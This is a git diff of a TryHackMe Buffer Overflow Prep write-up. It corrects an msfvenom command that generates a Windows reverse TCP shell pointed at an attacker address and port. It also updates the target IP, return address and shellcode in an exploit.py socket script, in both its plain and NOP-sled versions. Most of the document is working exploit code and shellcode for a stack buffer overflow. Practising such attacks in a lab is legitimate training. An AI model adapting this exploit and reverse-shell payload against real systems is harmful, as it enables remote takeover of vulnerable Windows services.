--- a/TryHackMe/Buffer_Overflow_Prep/1.md
+++ b/TryHackMe/Buffer_Overflow_Prep/1.md
@@ -308,7 +308,7 @@ Next, I need the shellcode payload, which I will generate with msfvenom and omit
 I take note of my ipv4 address on the tun0 network to get lhost
 
 
-`msfvenom -p windows/shell_reverse_tcp LHOST=10.6.77.38L PORT=53 EXITFUNC=thread -b "\x00\x07\x2e\a0" -f c`
+`msfvenom -p windows/shell_reverse_tcp LHOST=10.6.77.38 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c`
 
 With these bits of information I am ready to create exploit.py, trying the first return address:
 
@@ -317,38 +317,38 @@ Exploit.py
 #!/usr/bin/env python3
 import socket
 
-ip = "10.10.45.178"
+ip = "10.10.120.24"
 port = 1337
 
 prefix = "OVERFLOW1 "
 offset = 1978
 overflow = "A" * offset
-retn = "\xaf\x11\x50\x62"
+retn = "\x05\x12\x50\x62"
 padding = ""
-payload =("\xbb\x39\xe8\x32\x18\xdb\xc4\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
-"\x52\x31\x5a\x12\x83\xea\xfc\x03\x63\xe6\xd0\xed\x6f\x1e\x96"
-"\x0e\x8f\xdf\xf7\x87\x6a\xee\x37\xf3\xff\x41\x88\x77\xad\x6d"
-"\x63\xd5\x45\xe5\x01\xf2\x6a\x4e\xaf\x24\x45\x4f\x9c\x15\xc4"
-"\xd3\xdf\x49\x26\xed\x2f\x9c\x27\x2a\x4d\x6d\x75\xe3\x19\xc0"
-"\x69\x80\x54\xd9\x02\xda\x79\x59\xf7\xab\x78\x48\xa6\xa0\x22"
-"\x4a\x49\x64\x5f\xc3\x51\x69\x5a\x9d\xea\x59\x10\x1c\x3a\x90"
-"\xd9\xb3\x03\x1c\x28\xcd\x44\x9b\xd3\xb8\xbc\xdf\x6e\xbb\x7b"
-"\x9d\xb4\x4e\x9f\x05\x3e\xe8\x7b\xb7\x93\x6f\x08\xbb\x58\xfb"
-"\x56\xd8\x5f\x28\xed\xe4\xd4\xcf\x21\x6d\xae\xeb\xe5\x35\x74"
-"\x95\xbc\x93\xdb\xaa\xde\x7b\x83\x0e\x95\x96\xd0\x22\xf4\xfe"
-"\x15\x0f\x06\xff\x31\x18\x75\xcd\x9e\xb2\x11\x7d\x56\x1d\xe6"
-"\x82\x4d\xd9\x78\x7d\x6e\x1a\x51\xba\x3a\x4a\xc9\x6b\x43\x01"
-"\x09\x93\x96\x86\x59\x3b\x49\x67\x09\xfb\x39\x0f\x43\xf4\x66"
-"\x2f\x6c\xde\x0e\xda\x97\x89\x3a\x1d\xda\x6f\x53\x23\xe4\x6f"
-"\x96\xaa\x02\x05\xc8\xfa\x9d\xb2\x71\xa7\x55\x22\x7d\x7d\x10"
-"\x64\xf5\x72\xe5\x2b\xfe\xff\xf5\xdc\x0e\x4a\xa7\x4b\x10\x60"
-"\xcf\x10\x83\xef\x0f\x5e\xb8\xa7\x58\x37\x0e\xbe\x0c\xa5\x29"
-"\x68\x32\x34\xaf\x53\xf6\xe3\x0c\x5d\xf7\x66\x28\x79\xe7\xbe"
-"\xb1\xc5\x53\x6f\xe4\x93\x0d\xc9\x5e\x52\xe7\x83\x0d\x3c\x6f"
-"\x55\x7e\xff\xe9\x5a\xab\x89\x15\xea\x02\xcc\x2a\xc3\xc2\xd8"
-"\x53\x39\x73\x26\x8e\xf9\x93\xc5\x1a\xf4\x3b\x50\xcf\xb5\x21"
-"\x63\x3a\xf9\x5f\xe0\xce\x82\x9b\xf8\xbb\x87\xe0\xbe\x50\xfa"
-"\x79\x2b\x56\xa9\x7a\x7e";)
+payload = ("\xbe\x7e\xfd\x9d\xaf\xdb\xc9\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
+"\x52\x31\x73\x12\x03\x73\x12\x83\xbd\xf9\x7f\x5a\xbd\xea\x02"
+"\xa5\x3d\xeb\x62\x2f\xd8\xda\xa2\x4b\xa9\x4d\x13\x1f\xff\x61"
+"\xd8\x4d\xeb\xf2\xac\x59\x1c\xb2\x1b\xbc\x13\x43\x37\xfc\x32"
+"\xc7\x4a\xd1\x94\xf6\x84\x24\xd5\x3f\xf8\xc5\x87\xe8\x76\x7b"
+"\x37\x9c\xc3\x40\xbc\xee\xc2\xc0\x21\xa6\xe5\xe1\xf4\xbc\xbf"
+"\x21\xf7\x11\xb4\x6b\xef\x76\xf1\x22\x84\x4d\x8d\xb4\x4c\x9c"
+"\x6e\x1a\xb1\x10\x9d\x62\xf6\x97\x7e\x11\x0e\xe4\x03\x22\xd5"
+"\x96\xdf\xa7\xcd\x31\xab\x10\x29\xc3\x78\xc6\xba\xcf\x35\x8c"
+"\xe4\xd3\xc8\x41\x9f\xe8\x41\x64\x4f\x79\x11\x43\x4b\x21\xc1"
+"\xea\xca\x8f\xa4\x13\x0c\x70\x18\xb6\x47\x9d\x4d\xcb\x0a\xca"
+"\xa2\xe6\xb4\x0a\xad\x71\xc7\x38\x72\x2a\x4f\x71\xfb\xf4\x88"
+"\x76\xd6\x41\x06\x89\xd9\xb1\x0f\x4e\x8d\xe1\x27\x67\xae\x69"
+"\xb7\x88\x7b\x3d\xe7\x26\xd4\xfe\x57\x87\x84\x96\xbd\x08\xfa"
+"\x87\xbe\xc2\x93\x22\x45\x85\x91\xb4\x08\x73\xce\xba\x92\x6a"
+"\x52\x32\x74\xe6\x7a\x12\x2f\x9f\xe3\x3f\xbb\x3e\xeb\x95\xc6"
+"\x01\x67\x1a\x37\xcf\x80\x57\x2b\xb8\x60\x22\x11\x6f\x7e\x98"
+"\x3d\xf3\xed\x47\xbd\x7a\x0e\xd0\xea\x2b\xe0\x29\x7e\xc6\x5b"
+"\x80\x9c\x1b\x3d\xeb\x24\xc0\xfe\xf2\xa5\x85\xbb\xd0\xb5\x53"
+"\x43\x5d\xe1\x0b\x12\x0b\x5f\xea\xcc\xfd\x09\xa4\xa3\x57\xdd"
+"\x31\x88\x67\x9b\x3d\xc5\x11\x43\x8f\xb0\x67\x7c\x20\x55\x60"
+"\x05\x5c\xc5\x8f\xdc\xe4\xe5\x6d\xf4\x10\x8e\x2b\x9d\x98\xd3"
+"\xcb\x48\xde\xed\x4f\x78\x9f\x09\x4f\x09\x9a\x56\xd7\xe2\xd6"
+"\xc7\xb2\x04\x44\xe7\x96")
 
 postfix = ""
 
@@ -373,38 +373,38 @@ Before I am ready to fire off the exploit, I want to add a NOP sled in order to 
 #!/usr/bin/env python3
 import socket
 
-ip = "10.10.45.178"
+ip = "10.10.120.24"
 port = 1337
 
 prefix = "OVERFLOW1 "
 offset = 1978
 overflow = "A" * offset
-retn = "\xaf\x11\x50\x62"
+retn = "\x05\x12\x50\x62"
 padding = "\x90" * 16
-payload =("\xbb\x39\xe8\x32\x18\xdb\xc4\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
-"\x52\x31\x5a\x12\x83\xea\xfc\x03\x63\xe6\xd0\xed\x6f\x1e\x96"
-"\x0e\x8f\xdf\xf7\x87\x6a\xee\x37\xf3\xff\x41\x88\x77\xad\x6d"
-"\x63\xd5\x45\xe5\x01\xf2\x6a\x4e\xaf\x24\x45\x4f\x9c\x15\xc4"
-"\xd3\xdf\x49\x26\xed\x2f\x9c\x27\x2a\x4d\x6d\x75\xe3\x19\xc0"
-"\x69\x80\x54\xd9\x02\xda\x79\x59\xf7\xab\x78\x48\xa6\xa0\x22"
-"\x4a\x49\x64\x5f\xc3\x51\x69\x5a\x9d\xea\x59\x10\x1c\x3a\x90"
-"\xd9\xb3\x03\x1c\x28\xcd\x44\x9b\xd3\xb8\xbc\xdf\x6e\xbb\x7b"
-"\x9d\xb4\x4e\x9f\x05\x3e\xe8\x7b\xb7\x93\x6f\x08\xbb\x58\xfb"
-"\x56\xd8\x5f\x28\xed\xe4\xd4\xcf\x21\x6d\xae\xeb\xe5\x35\x74"
-"\x95\xbc\x93\xdb\xaa\xde\x7b\x83\x0e\x95\x96\xd0\x22\xf4\xfe"
-"\x15\x0f\x06\xff\x31\x18\x75\xcd\x9e\xb2\x11\x7d\x56\x1d\xe6"
-"\x82\x4d\xd9\x78\x7d\x6e\x1a\x51\xba\x3a\x4a\xc9\x6b\x43\x01"
-"\x09\x93\x96\x86\x59\x3b\x49\x67\x09\xfb\x39\x0f\x43\xf4\x66"
-"\x2f\x6c\xde\x0e\xda\x97\x89\x3a\x1d\xda\x6f\x53\x23\xe4\x6f"
-"\x96\xaa\x02\x05\xc8\xfa\x9d\xb2\x71\xa7\x55\x22\x7d\x7d\x10"
-"\x64\xf5\x72\xe5\x2b\xfe\xff\xf5\xdc\x0e\x4a\xa7\x4b\x10\x60"
-"\xcf\x10\x83\xef\x0f\x5e\xb8\xa7\x58\x37\x0e\xbe\x0c\xa5\x29"
-"\x68\x32\x34\xaf\x53\xf6\xe3\x0c\x5d\xf7\x66\x28\x79\xe7\xbe"
-"\xb1\xc5\x53\x6f\xe4\x93\x0d\xc9\x5e\x52\xe7\x83\x0d\x3c\x6f"
-"\x55\x7e\xff\xe9\x5a\xab\x89\x15\xea\x02\xcc\x2a\xc3\xc2\xd8"
-"\x53\x39\x73\x26\x8e\xf9\x93\xc5\x1a\xf4\x3b\x50\xcf\xb5\x21"
-"\x63\x3a\xf9\x5f\xe0\xce\x82\x9b\xf8\xbb\x87\xe0\xbe\x50\xfa"
-"\x79\x2b\x56\xa9\x7a\x7e";)
+payload = ("\xbe\x7e\xfd\x9d\xaf\xdb\xc9\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
+"\x52\x31\x73\x12\x03\x73\x12\x83\xbd\xf9\x7f\x5a\xbd\xea\x02"
+"\xa5\x3d\xeb\x62\x2f\xd8\xda\xa2\x4b\xa9\x4d\x13\x1f\xff\x61"
+"\xd8\x4d\xeb\xf2\xac\x59\x1c\xb2\x1b\xbc\x13\x43\x37\xfc\x32"
+"\xc7\x4a\xd1\x94\xf6\x84\x24\xd5\x3f\xf8\xc5\x87\xe8\x76\x7b"
+"\x37\x9c\xc3\x40\xbc\xee\xc2\xc0\x21\xa6\xe5\xe1\xf4\xbc\xbf"
+"\x21\xf7\x11\xb4\x6b\xef\x76\xf1\x22\x84\x4d\x8d\xb4\x4c\x9c"
+"\x6e\x1a\xb1\x10\x9d\x62\xf6\x97\x7e\x11\x0e\xe4\x03\x22\xd5"
+"\x96\xdf\xa7\xcd\x31\xab\x10\x29\xc3\x78\xc6\xba\xcf\x35\x8c"
+"\xe4\xd3\xc8\x41\x9f\xe8\x41\x64\x4f\x79\x11\x43\x4b\x21\xc1"
+"\xea\xca\x8f\xa4\x13\x0c\x70\x18\xb6\x47\x9d\x4d\xcb\x0a\xca"
+"\xa2\xe6\xb4\x0a\xad\x71\xc7\x38\x72\x2a\x4f\x71\xfb\xf4\x88"
+"\x76\xd6\x41\x06\x89\xd9\xb1\x0f\x4e\x8d\xe1\x27\x67\xae\x69"
+"\xb7\x88\x7b\x3d\xe7\x26\xd4\xfe\x57\x87\x84\x96\xbd\x08\xfa"
+"\x87\xbe\xc2\x93\x22\x45\x85\x91\xb4\x08\x73\xce\xba\x92\x6a"
+"\x52\x32\x74\xe6\x7a\x12\x2f\x9f\xe3\x3f\xbb\x3e\xeb\x95\xc6"
+"\x01\x67\x1a\x37\xcf\x80\x57\x2b\xb8\x60\x22\x11\x6f\x7e\x98"
+"\x3d\xf3\xed\x47\xbd\x7a\x0e\xd0\xea\x2b\xe0\x29\x7e\xc6\x5b"
+"\x80\x9c\x1b\x3d\xeb\x24\xc0\xfe\xf2\xa5\x85\xbb\xd0\xb5\x53"
+"\x43\x5d\xe1\x0b\x12\x0b\x5f\xea\xcc\xfd\x09\xa4\xa3\x57\xdd"
+"\x31\x88\x67\x9b\x3d\xc5\x11\x43\x8f\xb0\x67\x7c\x20\x55\x60"
+"\x05\x5c\xc5\x8f\xdc\xe4\xe5\x6d\xf4\x10\x8e\x2b\x9d\x98\xd3"
+"\xcb\x48\xde\xed\x4f\x78\x9f\x09\x4f\x09\x9a\x56\xd7\xe2\xd6"
+"\xc7\xb2\x04\x44\xe7\x96")
 
 postfix = ""
 
@@ -425,3 +425,7 @@ except:
 
 I reset the program. Start a listener and run exploit.py
 
+![image](https://user-images.githubusercontent.com/83407557/185220991-a6acc747-9e55-4c0f-9183-be8b50c0736b.png)
+
+
+![image](https://user-images.githubusercontent.com/83407557/185221079-3350df19-2e74-4701-a47f-3175f0bb71a0.png)
